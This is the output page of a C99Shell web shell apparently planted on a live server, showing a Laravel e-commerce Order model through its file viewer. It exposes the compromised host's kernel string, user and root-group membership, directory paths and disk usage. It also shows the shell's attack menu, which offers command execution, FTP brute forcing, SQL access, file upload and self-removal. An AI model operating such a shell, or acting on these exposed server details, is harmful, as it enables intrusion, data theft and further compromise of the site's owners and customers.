!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html/app/Models/   drwxr-xr-x
Free 29.42 GB of 117.98 GB (24.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Order.php (1.68 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace App\Models;

use 
Illuminate\Database\Eloquent\Model;
use 
Illuminate\Database\Eloquent\SoftDeletes;

class 
Order extends Model
{
    use 
SoftDeletes;

    protected 
$table 'order';
    const 
INVOICE_PREFIX 'INV';

    protected 
$fillable = ['invoice_no''invoice_prefix''customer_id''customer_group_id',
        
'firstname''lastname''email''telephone''shipping_firstname''shipping_lastname''shipping_company''shipping_address_1''shipping_address_2',
        
'shipping_city''shipping_postcode''shipping_country_id''shipping_address_format''shipping_method',
        
'shipping_code','shipping_name''comment''total''order_status_id''commission''tracking''language_id','tax_amount','discount','shipping_charge','grand_total',
        
'currency_code''currency_value','order_date''ip''forwarded_ip''user_agent''accept_language','payment_method','transaction_id','billing_name','billing_address_1',
        
'billing_address_2','billing_city','billing_postcode','billing_country_id'
    
];

    public function 
productRelation() {
        return 
$this->hasMany('App\Models\OrderProduct','order_id','id');
    }

    public function 
orderStatus() {
        return 
$this->hasOne('App\Models\OrderStatus','id','order_status_id');
    }

    public function 
orderCountry() {
        return 
$this->hasOne('App\Models\Country','id','shipping_country_id');
    }

    public function 
products() {
        return 
$this->hasMany('App\Models\OrderProduct','order_id','id');
    }

    public function 
productCounts() {
      return 
$this->hasMany('App\Models\OrderProduct','order_id','id')->selectRaw('SUM(order_product.order_id) as payment_amount');
    }




}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0032 ]--